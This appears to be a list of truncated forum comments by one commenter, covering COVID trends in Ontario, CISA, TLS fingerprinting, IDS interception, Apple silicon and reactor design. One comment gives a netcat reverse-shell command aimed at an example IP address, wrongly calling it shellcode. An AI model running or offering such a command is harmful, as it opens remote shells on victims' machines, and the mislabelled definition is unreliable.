We're just outside the 'sphere of influence' of Toronto, and I can really see the diligence going down and the cases going up. Our area wasn't hit very hard in May, maxing out at just over 1:4000. Now it's getting c

When cases were down this summer (Ontario, Canada) I briefly considered having an outdoor 'x-mas in august' for the family. Seeing the trajectory we're on now, really regretting not doing that.

The Chairperson of CISA has decent credibility, at least to me as a Canadian. I don't care much for US politics, but the work they do is quite high quality and useful. I've been subscribed to their security newsletters/bullet

This appears to be complementary to their other TLS fingerprinting project, JA3. Where JARM quickly scans servers for TLS configuration, JA3 sniffs network traffic to fingerprint client/server TLS handshakes. I wonder what research is

Some systems use a CA cert on endpoints and a CA key on the web proxy portion of the IDS, so it's able to intercept and decrypt all traffic that passes through. This isn't as common anymore since it has massive security risks asso

Has there been any word on third-party OS support for the new AS macs? Not just so geeks can run Gentoo on them, but also for corporate customers to virtualize MacOS. I know some fellows who run ESXi/Vcenter on clusters of Minis to run

Very interesting, thanks. Which approach is 'better' for modular reactors? I would imagine that having the steam generator inside the pressure vessel makes it safer (at least in terms of leaks) since the primary/secondary loo

In 'hacking' terms, shellcode is a basic means to get remote control of somebody's machine using unconventional means. The most basic example would be using Netcat: nc -e "/bin/sh" 66.77.88.99 6789

I don't think anybody disagrees that json is wasteful and costly, it's just that most people see it as the necessary evil to make the data portable and easy to integrate with different SIEMs or databases. I don't have a ton o

From what I understand, this is essentially an extension to Snort that uses high performance NICs with built-in FPGAs to do the heavy lifting. Honestly, I don't really think this is the best way forward. Using Suricata on cheap hardwar
